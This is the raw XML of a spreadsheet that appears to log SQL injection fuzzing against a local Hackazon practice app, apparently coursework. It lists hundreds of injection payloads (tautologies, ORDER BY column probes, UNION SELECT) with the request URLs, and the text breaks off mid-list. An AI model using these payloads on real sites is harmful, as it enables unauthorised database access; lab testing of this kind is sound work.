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Data/PTIT document/Ki 7 D17/MMHNC/Fuzzing/hackazon.webscantest.com/hackazon_local/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7DF998A8-F0F5-3B4D-8EC8-968DE3B107BA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="500" windowWidth="25600" windowHeight="13940" activeTab="3" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="injectable" sheetId="2" r:id="rId2"/>
    <sheet name="uninjectable" sheetId="3" r:id="rId3"/>
    <sheet name="conclusion" sheetId="4" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$1:$P$604</definedName>
    <definedName name="Google_Sheet_Link_505424488_765444145" hidden="1">SQLI_2_fuzzed</definedName>
    <definedName name="SQLI_2_fuzzed" localSheetId="0">Sheet1!$A$1:$P$617</definedName>
  </definedNames>
  <calcPr calcId="191029"/>
  <extLst>
    <ext uri="GoogleSheetsCustomDataVersion1">
      <go:sheetsCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId5" roundtripDataSignature="AMtx7mhufTR7z1QeT+JddNpSd5No49KDEg=="/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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6466" uniqueCount="1357">
  <si>
    <t>Task ID</t>
  </si>
  <si>
    <t>Message Type</t>
  </si>
  <si>
    <t>Req. Timestamp</t>
  </si>
  <si>
    <t>Method</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>Code</t>
  </si>
  <si>
    <t>Reason</t>
  </si>
  <si>
    <t>RTT</t>
  </si>
  <si>
    <t>Size Req. Header</t>
  </si>
  <si>
    <t>Size Req. Body</t>
  </si>
  <si>
    <t>Size Resp. Header</t>
  </si>
  <si>
    <t>Size Resp. Body</t>
  </si>
  <si>
    <t>Highest Alert</t>
  </si>
  <si>
    <t>State</t>
  </si>
  <si>
    <t>Payloads</t>
  </si>
  <si>
    <t>Level</t>
  </si>
  <si>
    <t>Original</t>
  </si>
  <si>
    <t>Tue Dec 08 16:34:09 ICT 2020</t>
  </si>
  <si>
    <t>GET</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3</t>
  </si>
  <si>
    <t>OK</t>
  </si>
  <si>
    <t>[]</t>
  </si>
  <si>
    <t>Fuzzed</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:30 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%201=1%23</t>
  </si>
  <si>
    <t>Reflected</t>
  </si>
  <si>
    <t>[ OR 1=1#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%201=0</t>
  </si>
  <si>
    <t>[ OR 1=0]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%20x=y</t>
  </si>
  <si>
    <t>[ OR x=y]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%201=1</t>
  </si>
  <si>
    <t>[ OR 1=1]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%20x=x</t>
  </si>
  <si>
    <t>[ OR x=x]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%201=0%23</t>
  </si>
  <si>
    <t>[ OR 1=0#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:31 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%20x=x%23</t>
  </si>
  <si>
    <t>[ OR x=x#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%20x=y%23</t>
  </si>
  <si>
    <t>[ OR x=y#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%201=1--%20</t>
  </si>
  <si>
    <t>[ OR 1=1-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:32 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%201=0--%20</t>
  </si>
  <si>
    <t>[ OR 1=0-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%20x=x--%20</t>
  </si>
  <si>
    <t>[ OR x=x-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%20x=y--%20</t>
  </si>
  <si>
    <t>[ OR x=y-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:33 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytW</t>
  </si>
  <si>
    <t>Service Temporarily Unavailable</t>
  </si>
  <si>
    <t>[ OR 3409=3409 AND ('pytW' LIKE 'pytW]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytY</t>
  </si>
  <si>
    <t>[ OR 3409=3409 AND ('pytW' LIKE 'pytY]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:34 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20HAVING%201=1</t>
  </si>
  <si>
    <t>[ HAVING 1=1]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20HAVING%201=0</t>
  </si>
  <si>
    <t>[ HAVING 1=0]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:35 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20HAVING%201=1%23</t>
  </si>
  <si>
    <t>[ HAVING 1=1#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20HAVING%201=0%23</t>
  </si>
  <si>
    <t>[ HAVING 1=0#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20HAVING%201=1--%20</t>
  </si>
  <si>
    <t>[ HAVING 1=1-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20HAVING%201=0--%20</t>
  </si>
  <si>
    <t>[ HAVING 1=0-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:36 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=1</t>
  </si>
  <si>
    <t>[ AND 1=1]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:37 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=0</t>
  </si>
  <si>
    <t>[ AND 1=0]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=1--%20</t>
  </si>
  <si>
    <t>[ AND 1=1-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:38 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=0--%20</t>
  </si>
  <si>
    <t>[ AND 1=0-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:39 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=1%23</t>
  </si>
  <si>
    <t>[ AND 1=1#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:41 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=0%23</t>
  </si>
  <si>
    <t>[ AND 1=0#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:42 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=1%20AND%20'%25'='</t>
  </si>
  <si>
    <t>[ AND 1=1 AND '%'=']</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:43 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201=0%20AND%20'%25'='</t>
  </si>
  <si>
    <t>[ AND 1=0 AND '%'=']</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:44 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201083=1083%20AND%20(1427=1427</t>
  </si>
  <si>
    <t>[ AND 1083=1083 AND (1427=1427]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:45 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%207506=9091%20AND%20(5913=5913</t>
  </si>
  <si>
    <t>[ AND 7506=9091 AND (5913=5913]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:46 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%201083=1083%20AND%20('1427=1427</t>
  </si>
  <si>
    <t>[ AND 1083=1083 AND ('1427=1427]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%207506=9091%20AND%20('5913=5913</t>
  </si>
  <si>
    <t>[ AND 7506=9091 AND ('5913=5913]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20'pKlZ'='pKlZ</t>
  </si>
  <si>
    <t>[ AND 7300=7300 AND 'pKlZ'='pKlZ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20'pKlZ'='pKlY</t>
  </si>
  <si>
    <t>[ AND 7300=7300 AND 'pKlZ'='pKlY]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:47 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20('pKlZ'='pKlZ</t>
  </si>
  <si>
    <t>[ AND 7300=7300 AND ('pKlZ'='pKlZ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20('pKlZ'='pKlY</t>
  </si>
  <si>
    <t>[ AND 7300=7300 AND ('pKlZ'='pKlY]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1</t>
  </si>
  <si>
    <t>[ AS INJECTX WHERE 1=1 AND 1=1]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0</t>
  </si>
  <si>
    <t>[ AS INJECTX WHERE 1=1 AND 1=0]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1%23</t>
  </si>
  <si>
    <t>[ AS INJECTX WHERE 1=1 AND 1=1#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:48 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0%23</t>
  </si>
  <si>
    <t>[ AS INJECTX WHERE 1=1 AND 1=0#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1--</t>
  </si>
  <si>
    <t>[ AS INJECTX WHERE 1=1 AND 1=1--]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0--</t>
  </si>
  <si>
    <t>[ AS INJECTX WHERE 1=1 AND 1=0--]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:49 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1</t>
  </si>
  <si>
    <t>[ WHERE 1=1 AND 1=1]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0</t>
  </si>
  <si>
    <t>[ WHERE 1=1 AND 1=0]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:50 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1%23</t>
  </si>
  <si>
    <t>[ WHERE 1=1 AND 1=1#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0%23</t>
  </si>
  <si>
    <t>[ WHERE 1=1 AND 1=0#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:51 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1--</t>
  </si>
  <si>
    <t>[ WHERE 1=1 AND 1=1--]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0--</t>
  </si>
  <si>
    <t>[ WHERE 1=1 AND 1=0--]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:52 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%201--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:53 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%202--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 2-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:54 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%203--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 3-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%204--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 4-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:55 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%205--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 5-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%206--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 6-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:56 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%207--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 7-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%208--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 8-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:57 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%209--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 9-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2010--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 10-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:58 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2011--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 11-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2012--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 12-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:01:59 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2013--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 13-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23</t>
  </si>
  <si>
    <t>[ ORDER BY 14-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:00 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2015--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 15-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2016--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 16-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:01 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2017--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 17-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2018--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 18-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:02 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2019--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 19-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2020--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 20-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:03 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2021--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 21-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2022--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 22-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2023--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 23-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:04 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2024--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 24-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:05 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2025--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 25-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2026--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 26-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:06 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2027--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 27-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2028--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 28-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:07 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2029--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 29-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:09 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2030--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 30-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 31337-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%201%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:10 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%202%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 2# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%203%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 3# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%204%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 4# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%205%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 5# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:11 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%206%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 6# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%207%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 7# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%208%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 8# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:12 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%209%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 9# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2010%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 10# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2011%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 11# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2012%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 12# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:13 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2013%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 13# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2014%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 14# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2015%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 15# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:14 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2016%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 16# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2017%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 17# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2018%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 18# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2019%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 19# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:15 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2020%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 20# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:16 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2021%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 21# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:17 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2022%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 22# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:18 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2023%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 23# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:19 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2024%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 24# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:21 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2025%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 25# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2026%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 26# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:22 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2027%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 27# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2028%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 28# ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:23 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2029%23%20</t>
  </si>
  <si>
    <t>[ ORDER BY 29# ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2030%23</t>
  </si>
  <si>
    <t>[ ORDER BY 30#]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:24 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337%23</t>
  </si>
  <si>
    <t>[ ORDER BY 31337#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%201%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%202%20</t>
  </si>
  <si>
    <t>[ ORDER BY 2 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:25 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%203%20</t>
  </si>
  <si>
    <t>[ ORDER BY 3 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%204%20</t>
  </si>
  <si>
    <t>[ ORDER BY 4 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%205%20</t>
  </si>
  <si>
    <t>[ ORDER BY 5 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:26 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%206%20</t>
  </si>
  <si>
    <t>[ ORDER BY 6 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%207%20</t>
  </si>
  <si>
    <t>[ ORDER BY 7 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:27 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%208%20</t>
  </si>
  <si>
    <t>[ ORDER BY 8 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%209%20</t>
  </si>
  <si>
    <t>[ ORDER BY 9 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:28 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2010%20</t>
  </si>
  <si>
    <t>[ ORDER BY 10 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2011%20</t>
  </si>
  <si>
    <t>[ ORDER BY 11 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2012%20</t>
  </si>
  <si>
    <t>[ ORDER BY 12 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:29 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2013%20</t>
  </si>
  <si>
    <t>[ ORDER BY 13 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2014%20</t>
  </si>
  <si>
    <t>[ ORDER BY 14 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:30 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2015%20</t>
  </si>
  <si>
    <t>[ ORDER BY 15 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2016%20</t>
  </si>
  <si>
    <t>[ ORDER BY 16 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2017%20</t>
  </si>
  <si>
    <t>[ ORDER BY 17 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:31 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2018%20</t>
  </si>
  <si>
    <t>[ ORDER BY 18 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2019%20</t>
  </si>
  <si>
    <t>[ ORDER BY 19 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:32 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2020%20</t>
  </si>
  <si>
    <t>[ ORDER BY 20 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2021%20</t>
  </si>
  <si>
    <t>[ ORDER BY 21 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:33 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2022%20</t>
  </si>
  <si>
    <t>[ ORDER BY 22 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2023%20</t>
  </si>
  <si>
    <t>[ ORDER BY 23 ]</t>
  </si>
  <si>
    <t>Tue Dec 08 17:02:34 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2024%20</t>
  </si>
  <si>
    <t>[ ORDER BY 24 ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3%20ORDER%20BY%2025%20</t>
  </si>
  <si>
